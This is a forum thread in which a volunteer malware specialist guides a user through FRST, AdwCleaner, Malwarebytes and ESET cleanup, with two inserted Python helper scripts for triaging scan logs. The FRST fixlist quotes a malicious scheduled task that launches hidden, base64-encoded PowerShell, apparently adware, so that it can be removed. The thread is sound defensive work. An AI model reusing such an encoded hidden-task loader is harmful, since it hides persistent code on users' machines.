Tech Support Guy
Trusted Advisor & Malware Specialist
Hello.

In order to help us check your computer, please download and run FRST tool:

Download Farbar Recovery Scan Tool and save it to your desktop. --> IMPORTANT

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

If your antivirus software detects the tool as malicious, it’s safe to allow FRST to run. It is a false-positive detection.

If English is not your primary language, right click on FRST.exe/FRST64.exe and rename to FRSTEnglish.exe/FRST64English.exe
  • Double-click the FRST icon to run the tool. When the tool opens click Yes to disclaimer.
  • Press Scan button and wait for a while.
  • The scanner will produce two logs on your Desktop: FRST.txt and Addition.txt.
  • Please attach the content of these two logs in your next reply. If for any reason you can't attach a log, first zip it and then attach the zipped file.

Instructions on how to zip a file:
  • Locate the file or folder that you want to zip.
  • Press and hold (or right-click) the file or folder, select (or point to) Send to, and then select Compressed (zipped) folder. A new zipped folder with the same name is created in the same location.
 

Trusted Advisor & Malware Specialist
Hello, ptichun.

Thanks for your patience. I had to look into your logs very carefully. The computer is infected.

Please adhere to the guidelines below, and then carefully follow, in the same order, all the instructions after:

1. Always ask before acting. Do not continue if you are not sure, or if something unexpected happens!

2. Do not run any tools unless instructed to do so. Also, do not uninstall or install any software during the procedure, unless I ask you to do so.

3. Cracked or pirated programs are not only illegal, but also can make your computer a malware target. Having such programs installed is the easiest way to get infected. Thus, there is no need to clean the computer, since, sooner or later, it will get infected again. If you have such programs, please uninstall them now, before we start the cleaning procedure.

4. If your computer seems to start working normally, don't abandon the topic. Even if your system is behaving normally, there may still be some malware remnants left over. Additionally, malware can re-infect the computer if some remnants are left. Therefore, please complete all requested steps to make sure any malware is successfully eradicated from your PC.

5. You have to reply to my posts within 3 days. If you need some additional time, just let me know. Otherwise, I will leave the topic due to lack of feedback. If you are able, I would request you to check this thread at least once per day so that we can resolve your issues effectively and efficiently.

6. Logs from malware diagnostic or removal programs can take some time to get analyzed. Also, have in mind that all the experts here are volunteers and may not be available to assist when you post. Please, be patient, while I analyze your logs.

==================

My first comments/instructions regarding your logs:

1. Uninstall a Chrome extension
  • Open Chrome.
  • At the top right choose More (the three vertical dots) > More Tools > Extensions
  • Find Ace Script, and remove it, clicking on Remove.
  • Confirm the action by clicking Remove once again.

2. Unknown PDF files?

Do you recognize these PDF files in your Downloads folder? If not, please delete them.

C:\Users\vladi\Downloads\ACFrOgAYXmQz4gTnmdIB7PFYcIQT8fVMHcC6ZiLCdlXqwMWb6VkXvTIwd1tlixlf7qiNxk55742VOUXWJbiBJ8mnBgF_dhX2ZvqQtoUbMdStdFv-kme0khXax_1EUUk=.pdf

C:\Users\vladi\Downloads\ACFrOgAl-l4e598r43llSUaajBlFYid4xjtpSjoJq3-7aH-piQaFR_esYmIsY_x_azns9H2ZPVMzjC1DHG3XFaC-L-futzkgW6h3uKBobOKOSpliO9SRFmH-PjfvEIMvCCN4yg5WdcmN6Qz92VUA.pdf


3. FRST

Please do the following to run a FRST fix.

NOTICE: This script was written specifically for this user. Running it on another machine may cause damage to your operating system
  • Select the entire contents of the code box below, from the "Start::" line to "End::", including both lines. Right-click and select "Copy". No need to paste anything anywhere.
Code:
Start::
CreateRestorePoint:
CloseProcesses:
CustomCLSID: HKU\S-1-5-21-1720742152-1034260963-3630301151-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\vladi\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20130.1\x64\Microsoft.Teams.AddinLoader.dll => No File
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} =>  -> No File
FirewallRules: [{480AEB4F-5A3B-418A-B4DB-60790B432ADC}] => (Allow) C:\Program Files (x86)\Anvsoft\Syncios\pdt_syncios.exe => No File
FirewallRules: [TCP Query User{9CD4A644-57D9-47AB-8EED-4FF4DE7EF1A9}C:\users\vladi\appdata\roaming\acestream\engine\ace_engine.exe] => (Block) C:\users\vladi\appdata\roaming\acestream\engine\ace_engine.exe => No File
FirewallRules: [UDP Query User{D4C643F1-B5EE-4DEA-A770-7CAE01F293C1}C:\users\vladi\appdata\roaming\acestream\engine\ace_engine.exe] => (Block) C:\users\vladi\appdata\roaming\acestream\engine\ace_engine.exe => No File
FirewallRules: [{EA949BDE-E23D-49F1-AFE3-7E71F43D01FE}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe => No File
FirewallRules: [{6129347F-A595-4183-84C9-EC16F241E180}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe => No File
FirewallRules: [TCP Query User{C7F82E7E-31D0-45CD-9B97-4C543CCE029C}C:\users\vladi\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\vladi\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [UDP Query User{BA362647-739D-4A90-AD66-166933BE266C}C:\users\vladi\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\vladi\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [TCP Query User{5AECFC5B-D830-4207-9F15-07DD4E844934}C:\users\vladi\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\vladi\appdata\roaming\bloom\bloom.exe => No File
FirewallRules: [UDP Query User{22BD863D-039D-4B1D-BFD4-8D9D5768B1E4}C:\users\vladi\appdata\roaming\bloom\bloom.exe] => (Block) C:\users\vladi\appdata\roaming\bloom\bloom.exe => No File
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] ->
Task: {6CD22A28-8680-485E-A066-9BFD9A8E767A} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => C:\WINDOWS\system32\MusNotification.exe /RunOnAC RebootDialog (No File)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => C:\WINDOWS\System32\MbaeParserTask.exe (No File)
Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => C:\WINDOWS\system32\MusNotification.exe (No File)
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
FF HKU\S-1-5-21-1720742152-1034260963-3630301151-1001\...\Firefox\Extensions: [[email protected]] - C:\Users\vladi\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi
FF Extension: (Ace Script) - C:\Users\vladi\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi [2018-01-24]
CHR HKU\S-1-5-21-1720742152-1034260963-3630301151-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo]
Task: {37D0253A-124A-43D0-97FF-F540DDE131FE} - System32\Tasks\chrome customize => cmd /c powershell -WindowStyle Hidden -E "CgAKACQAdgBhAHIASgA9ACQAbgB1AGwAbAA7AAoACgAKACQAcABhAFIATQAgAD0AIAAiAFcAeQBJADMATwBUAFkAMABOAGoAWQAyAE0AegBrAHgATQBqAGsAMABOAEQASQB5AE0ARABVAGkATABEAEUAMgBOAEQAWQA0AE4AegBBAHkATwBEAEkAcwBJAGkASgBkACIAOwAKACQAbwBrAD0AJAB0AHIAdQBlAAoACgAKACQAVgBhAHIAXwBkACAAPQAgAC (the data entry has 5171 more characters). <==== ATTENTION
C:\Users\vladi\AppData\Roaming\Bloom
EmptyTemp:
End::
  • Right-click on FRST64 on your Desktop, to run it as administrator. When the tool opens, click "yes" to the disclaimer.
  • Press the Fix button once and wait.
  • FRST will process fixlist.txt
  • When finished, it will produce a log fixlog.txt on your Desktop.
  • Post the log in your next reply.

In your next reply please post:
  1. If you uninstalled the extension
  2. What did you do with the PDF files
  3. The fixlog.txt
 
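A way to triage the Task entries that FRST prints, as in the fix above (an added example, not FRST's code and not the specialist's): it flags orphaned tasks marked (No File) and tasks that launch PowerShell hidden with an encoded command, and decodes that command while tolerating the truncation FRST applies to long values. The sample lines and the encoded one-liner are constructed for the example, not the thread's real entries.

```python
import base64
import re

# Added example, not FRST's own code: triage FRST "Task:" lines the way the
# fix above does, flagging orphaned tasks and hidden, encoded PowerShell.

TASK_RE = re.compile(r"^Task: \{(?P<id>[0-9A-Fa-f-]+)\} - (?P<path>.+?) => (?P<cmd>.+)$")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters>" followed by a base64-looking token of useful length.
ENC_RE = re.compile(r'-e[a-z]*\s+"?([A-Za-z0-9+/=]{16,})', re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
# FRST shortens long registry/task data and appends this marker.
TRUNC_RE = re.compile(r"\(the data entry has (\d+) more characters\)")


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand payload: base64 over the UTF-16LE script bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Reverse of encode_ps. Tolerates a truncated blob, because FRST prints only
    a prefix of long values (the thread's entry had 5171 more characters)."""
    b64 = b64[: len(b64) - len(b64) % 4]  # drop a dangling partial quartet
    raw = base64.b64decode(b64)
    if len(raw) % 2:
        raw = raw[:-1]  # UTF-16LE needs whole 2-byte code units
    return raw.decode("utf-16-le", errors="replace")


def triage_tasks(lines):
    """Return one finding per suspicious Task line: id, task path, reasons, and
    the decoded PowerShell when an encoded command was present."""
    findings = []
    for line in lines:
        m = TASK_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        reasons = []
        if "(No File)" in cmd:
            reasons.append("orphaned (target missing)")
        decoded = None
        if "powershell" in cmd.lower():
            if HIDDEN_RE.search(cmd):
                reasons.append("hidden powershell window")
            enc = ENC_RE.search(cmd)
            if enc:
                decoded = decode_encoded_command(enc.group(1))
                reasons.append("encoded command")
        if TRUNC_RE.search(cmd):
            reasons.append("payload truncated in log")
        if reasons:
            findings.append({"id": m.group("id"), "task": m.group("path"),
                             "reasons": reasons, "decoded": decoded})
    return findings


# Constructed sample lines in FRST's Task format (not the thread's real entries);
# the encoded script is a harmless constructed one-liner, not the thread's payload.
SAMPLE_LINES = [
    "Task: {AAAAAAAA-0000-0000-0000-000000000001} - System32\\Tasks\\Microsoft\\Windows"
    "\\UpdateOrchestrator\\Reboot_AC => C:\\WINDOWS\\system32\\MusNotification.exe /RunOnAC RebootDialog (No File)",
    "Task: {AAAAAAAA-0000-0000-0000-000000000002} - System32\\Tasks\\chrome customize => "
    'cmd /c powershell -WindowStyle Hidden -E "' + encode_ps("$a = 'constructed sample'; Write-Output $a") + '"',
    "Task: {AAAAAAAA-0000-0000-0000-000000000003} - System32\\Tasks\\Backup => C:\\Tools\\backup.exe /quiet",
]

if __name__ == "__main__":
    for f in triage_tasks(SAMPLE_LINES):
        print(f["id"], f["task"], ", ".join(f["reasons"]))
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Run it against the Task lines copied out of a real FRST.txt to get a readable list of what each flagged task actually executes before deciding what goes into the fixlist.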

Discussion Starter · #5
Hello, thank you for your help.

1. Extension has been installed according to your (however, chrome is still installed)
2. I deleted both PDF files successfully.
 

Trusted Advisor & Malware Specialist
Hello, ptichun.

1. Extension has been installed according to your (however, chrome is still installed)
I guess, you uninstalled the extension successfully, right?

We didn't attempt to remove Chrome. Do you want to uninstall it?


1. Run AdwCleaner (scan only)

Download AdwCleaner and save it to your desktop.
  • Double click AdwCleaner.exe to run it.
  • Click Scan Now.
    • When the scan has finished, a Scan Results window will open.
    • Click Cancel (at this point do not attempt to Quarantine anything that is found)
  • Now click the Log Files tab.
    • Double click on the latest scan log (Scan logs have a [S0*] suffix, where * is replaced by a number. The latest scan will have the largest number)
    • A Notepad file will open containing the results of the scan.
    • Please post the contents of the file in your next reply.

2. Run Malwarebytes (scan only)
  • Download Malwarebytes and save it to your Desktop.
  • Once downloaded, close all programs and windows on your computer.
  • Double-click on the icon on your desktop named MBSetup.exe. This will start the installation of MBAM onto your computer.
  • Follow the instructions to install the program.
  • When finished, double click the program's icon created on your Desktop.
  • Click the little gear on the top right (Settings) and when it opens, click the Security tab and make sure about the following:
    Code:
    Under the title Scan Options, all the options are checked.
    Under the title Windows Security Center (Premium only) the option is NOT checked.
    Under the title Potentially unwanted items all options are set to Always.
  • Click on the little gear to return to the main menu and select Scan. The program will start scanning your computer. This may take about 10 minutes, but in some cases it may take longer.
  • When finished, you will see the Threat Scan Summary window open.
If threats are not found, click View Report and proceed to the two last steps below.

If threats are found, make sure that all threats are not selected, close the program and proceed to the next steps below.
  • Open Malwarebytes again, click on the Scanner, and then on the Reports tab.
  • Find the report with the most recent date and double click on it.
  • Click on Export and then Copy to Clipboard.
  • Paste its content here, in your next reply.

In your next reply, please post:
  1. The AdwCleaner[S0*].txt
  2. The Malwarebytes report
 

Discussion Starter · #8
# -------------------------------
# Malwarebytes AdwCleaner 8.4.0.0
# -------------------------------
# Build: 08-30-2022
# Database: 2022-10-10.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 11-27-2022
# Duration: 00:00:19
# OS: Windows 11 (Build 22621.819)
# Scanned: 32094
# Detected: 38


* [ Services ] *

No malicious services found.

* [ Folders ] *

Adware.ChromeLoader C:\Users\vladi\AppData\Local\chrome_settings
PUP.Optional.Legacy C:\Users\vladi\AppData\LocalLow\.acestream
PUP.Optional.Legacy C:\Users\vladi\AppData\Roaming\.acestream
PUP.Optional.Legacy C:\Users\vladi\AppData\Roaming\acestream
PUP.Optional.Legacy C:\acestream_cache
PUP.Optional.Solvusoft C:\ProgramData\WinThruster

* [ Files ] *

No malicious files found.

* [ DLL ] *

No malicious DLLs found.

* [ WMI ] *

No malicious WMI found.

* [ Shortcuts ] *

No malicious shortcuts found.

* [ Tasks ] *

No malicious tasks found.

* [ Registry ] *

PUP.Optional.ASMagicPlayer HKCU\Software\Classes\acestream
PUP.Optional.AceStream HKCU\Software\RegisteredApplications|AceStream
PUP.Optional.Solvusoft HKLM\Software\Wow6432Node\WinThruster

* [ Chromium (and derivatives) ] *

No malicious Chromium entries found.

* [ Chromium URLs ] *

No malicious Chromium URLs found.

* [ Firefox (and derivatives) ] *

No malicious Firefox entries found.

* [ Firefox URLs ] *

No malicious Firefox URLs found.

* [ Hosts File Entries ] *

No malicious hosts file entries found.

* [ Preinstalled Software ] *

Preinstalled.HPAudioSwitch Folder C:\Program Files (x86)\HP\HPAUDIOSWITCH
Preinstalled.HPAudioSwitch Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF867D35-EADE-4583-9EEA-51955CFADD17}
Preinstalled.HPAudioSwitch Registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\HPAudioSwitch
Preinstalled.HPAudioSwitch Task C:\Windows\System32\Tasks\HPAUDIOSWITCH
Preinstalled.HPCleanFLC Registry HKCU\Software\Microsoft\Windows\CurrentVersion\Run|HPSEU_Host_Launcher
Preinstalled.HPCleanFLC Registry HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run|HPSEU_Host_Launcher
Preinstalled.HPCleanFLC Registry HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run|HPSEU_Host_Launcher
Preinstalled.HPRegistrationService Folder C:\ProgramData\HP\HP REGISTRATION SERVICE
Preinstalled.HPSupportAssistant Folder C:\HP\SUPPORT
Preinstalled.HPSupportAssistant Folder C:\Program Files (x86)\HEWLETT-PACKARD\HP SUPPORT FRAMEWORK
Preinstalled.HPSupportAssistant Folder C:\ProgramData\HEWLETT-PACKARD\HP SUPPORT FRAMEWORK
Preinstalled.HPSupportAssistant Folder C:\Users\vladi\AppData\Roaming\HEWLETT-PACKARD\HP SUPPORT FRAMEWORK
Preinstalled.HPSupportAssistant Registry HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Preinstalled.HPSupportAssistant Registry HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Preinstalled.HPSupportAssistant Registry HKLM\Software\Classes\CLSID\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Preinstalled.HPSupportAssistant Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Preinstalled.HPSupportAssistant Registry HKLM\Software\Wow6432Node\\Classes\CLSID\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Preinstalled.HPSupportAssistant Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Preinstalled.HPSureConnect Folder C:\Program Files\HPCOMMRECOVERY
Preinstalled.HPSureConnect Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{6468C4A5-E47E-405F-B675-A70A70983EA6}
Preinstalled.HPTouchpointAnalyticsClient Folder C:\ProgramData\HP\HP TOUCHPOINT ANALYTICS CLIENT
Preinstalled.HPTouchpointAnalyticsClient Registry HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{E5FB98E0-0784-44F0-8CEC-95CD4690C43F}
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDGAMES
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDTANGENT GAMES
Preinstalled.WildTangentGamesBundle Folder C:\Program Files (x86)\WILDTANGENT GAMES\SHORTCUTPROVIDER
Preinstalled.WildTangentGamesBundle Folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WILDTANGENT GAMES
Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\WildTangent wildgames Master Uninstall
Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{80831F60-19D7-43B3-A60C-5CAF8C478DF6}
Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{A39303AB-4898-4F12-BAA0-0B8630F86DB4}



########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########
 

Discussion Starter · #13
The scan is done but when I try to copy to clipboard and paste, Firefox gets stuck and I have to restart it. I tried saving a txt and attaching it but it still does not work?
What would you like me to do?
 

Trusted Advisor & Malware Specialist
Oh!!!

Many things are detected!!!

Let's clean!

1. AdwCleaner (Clean mode)

The findings in the Folders and Registry parts of the log are adware and PUPs, which stands for Potentially Unwanted Programs. In the instructions below, I will list them all to be removed.

The section at the bottom under Preinstalled Software is software that was apparently installed when the device was new, which you may or may not use. Personally, I do not keep anything I don't use/need. But it's your computer, so your decision.

To proceed, please do the following:
  • Double click AdwCleaner.exe on your Desktop, to run it as you did before.
  • Click Scan Now.
  • When the scan has finished a Scan Results window will open.
  • Please check all the boxes and then click Quarantine.
  • Click Next.
    • If any pre-installed software was found on your machine, a prompt window will open. Click OK to close it.
    • Check any pre-installed software items you want to remove.
    • Click Quarantine.
  • A prompt to save your work will appear.
    • Click Continue when you're ready to proceed.
  • A prompt to restart your computer will appear.
    • Click Restart Now.
  • Once your computer has restarted:
    • If it doesn't open automatically, please start AdwCleaner.
    • Click the Log Files tab.
    • Double click on the latest Clean log (Clean logs have a [C0*] suffix, where * is replaced by a number, the latest scan will have the largest number)
    • A Notepad file will open containing the results of the removal.
    • Please post the contents of the file in your next reply.

2. Run Malwarebytes (Clean mode)
  • Double click the program's icon on your Desktop, as you did before.
  • Click the little gear on the top right (Settings) and when it opens, click the Security tab and make sure about the following:
    Code:
    Under the title Scan Options, all the options are checked.
    Under the title Windows Security Center (Premium only) the option is unchecked.
    Under the title Potentially unwanted items all options are set to Always.
  • Click on the little gear to return to the main menu and select Scan. The program will start scanning your computer. This may take about 10 minutes, but in some cases it may take longer.
  • When finished, you will see the Threat Scan Summary window open.
  • If threats are not found, click View Report and proceed to the two last steps below.
  • If threats are found, make sure that all threats are selected, and click on Quarantine/Remove selected.
  • You may need to restart the computer.
  • Open Malwarebytes again, click on the Scanner, and then on the Reports tab.
  • Find the report with the most recent date and double click on it.
  • Click on Export and then Copy to Clipboard.
  • Paste its content here, in your next reply.

3. ESET Online Scan

Download ESET Online Scanner and save it to your desktop.
  • Right-click on esetonlinescanner_enu.exe and select Run as Administrator.
  • When the tool opens, click Get Started.
  • Read and accept the license agreement.
  • At the Welcome to ESET Online Scanner window, click Get Started.
  • Select whether you would like to send anonymous data to ESET.
  • Note: if you see the "Welcome Back to ESET Online Scanner" screen, click Computer Scan > Full Scan.
  • Click on the Full Scan option.
  • Select Enable ESET to detect and remove potentially unwanted applications, then click Start scan.
  • ESET will now begin scanning your computer. This may take some time.
  • When the scan is finished and if threats have been detected, select Save scan log. Save it to your desktop as eset.txt. Click on Continue.
  • ESET Online Scanner may ask if you'd like to turn on the Periodic Scan feature. Click on Continue.
  • On the next screen, you can leave feedback about the program if you wish. Check the box for Delete application data on closing. If you left feedback, click Submit and continue. If not, Close without feedback.
  • Open the scan log on your desktop (eset.txt) and copy and paste its contents into your next reply.


In your next reply, please post:
  1. The AdwCleaner[C0*].txt
  2. The Malwarebytes report
  3. The eset.txt
 
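A parser for the AdwCleaner scan report format posted earlier in the thread, splitting it the way step 1 above does: Folders and Registry findings go to the quarantine list, while Preinstalled Software items are listed separately as the user's own decision (an added example, not AdwCleaner's code and not the specialist's). The report text below is constructed in that format with placeholder paths, not the thread's real log.

```python
import re
from collections import Counter

# Added example, not AdwCleaner's own code: parse a scan report and separate
# adware/PUP findings from the optional Preinstalled (OEM) section.

SECTION_RE = re.compile(r"^\* \[ (?P<name>.+?) \] \*$")
HEADER_RE = re.compile(r"^# (?P<key>[A-Za-z]+): (?P<value>.+)$")
OPTIONAL_SECTION = "Preinstalled Software"


def parse_report(text):
    """Return (headers, sections). sections maps a section name to a list of
    (signature, kind, target); kind is the section name for ordinary sections
    and the explicit Folder/Registry/Task word that Preinstalled lines carry."""
    headers, sections, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        h = HEADER_RE.match(line)
        if h:
            headers[h.group("key")] = h.group("value")
            continue
        s = SECTION_RE.match(line)
        if s:
            current = s.group("name")
            sections[current] = []
            continue
        # Skip blank lines, decorative "# ---" / EOF lines and empty-section text.
        if not line or line.startswith("#") or current is None or line.startswith("No malicious"):
            continue
        signature, _, rest = line.partition(" ")
        if current == OPTIONAL_SECTION:
            kind, _, target = rest.partition(" ")
        else:
            kind, target = current, rest
        sections[current].append((signature, kind, target))
    return headers, sections


def triage(text):
    """Split detections into quarantine candidates and optional preinstalled
    items, count the quarantine entries by signature family, and check that the
    '# Detected:' header agrees with the number of entries (on the thread's own
    log: 6 folders + 3 registry + 29 preinstalled = 38)."""
    headers, sections = parse_report(text)
    quarantine = [e for name, entries in sections.items()
                  if name != OPTIONAL_SECTION for e in entries]
    preinstalled = sections.get(OPTIONAL_SECTION, [])
    families = Counter(sig.split(".", 1)[0] for sig, _, _ in quarantine)
    declared = int(headers.get("Detected", "-1"))
    return {
        "quarantine": quarantine,
        "preinstalled": preinstalled,
        "families": dict(families),
        "count_matches_header": declared == len(quarantine) + len(preinstalled),
    }


# Constructed report in AdwCleaner's layout (placeholder user and GUID, not the
# thread's real log). Signature names are the ones that appear in the thread.
SAMPLE_REPORT = r"""# Mode: Scan
# Detected: 5

* [ Services ] *

No malicious services found.

* [ Folders ] *

Adware.ChromeLoader C:\Users\example\AppData\Local\chrome_settings
PUP.Optional.Legacy C:\Users\example\AppData\Roaming\acestream

* [ Registry ] *

PUP.Optional.Solvusoft HKLM\Software\Wow6432Node\WinThruster

* [ Preinstalled Software ] *

Preinstalled.HPSupportAssistant Folder C:\HP\SUPPORT
Preinstalled.WildTangentGamesBundle Registry HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{PLACEHOLDER-GUID}

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########
"""

if __name__ == "__main__":
    result = triage(SAMPLE_REPORT)
    for sig, kind, target in result["quarantine"]:
        print("QUARANTINE", sig, kind, target)
    for sig, kind, target in result["preinstalled"]:
        print("OPTIONAL  ", sig, kind, target)
    print(result["families"], "header consistent:", result["count_matches_header"])
```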